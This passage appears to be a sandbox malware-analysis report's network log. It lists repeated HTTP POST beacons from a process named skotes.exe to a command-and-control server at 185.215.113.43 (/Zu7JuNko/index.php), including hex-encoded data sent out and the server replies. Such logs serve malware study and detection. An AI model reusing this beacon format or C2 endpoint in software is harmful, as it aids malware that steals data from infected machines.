                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:06 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            89192.168.2.450298185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:08.711370945 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:10.144728899 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:09 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            90192.168.2.450304185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:11.783363104 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:13.167059898 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:12 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            91192.168.2.450305185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:14.910084009 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:16.333276033 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:16 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            92192.168.2.450306185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:17.968185902 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:19.361911058 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:19 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            93192.168.2.450307185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:21.093163967 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:22.423648119 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:22 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            94192.168.2.450310185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:24.056931019 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:34.463260889 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            95192.168.2.450311185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:36.209681034 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:37.558794022 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:37 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            96192.168.2.450312185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:39.194171906 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:40.544028044 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:40 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            97192.168.2.450313185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:42.282114029 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:43.622931957 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:43 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            98192.168.2.450314185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:45.256031990 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:46.693897009 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:46 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            99192.168.2.450315185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:48.433163881 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:49.774158001 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:49 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            100192.168.2.450316185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:51.405581951 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:52.786778927 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            101192.168.2.450317185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:54.542630911 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:55.919285059 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:55 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            102192.168.2.450318185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:57.552783966 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:14:58.991306067 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:14:58 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            103192.168.2.450319185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:00.730146885 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:02.123550892 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:01 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            104192.168.2.450320185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:03.762418032 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
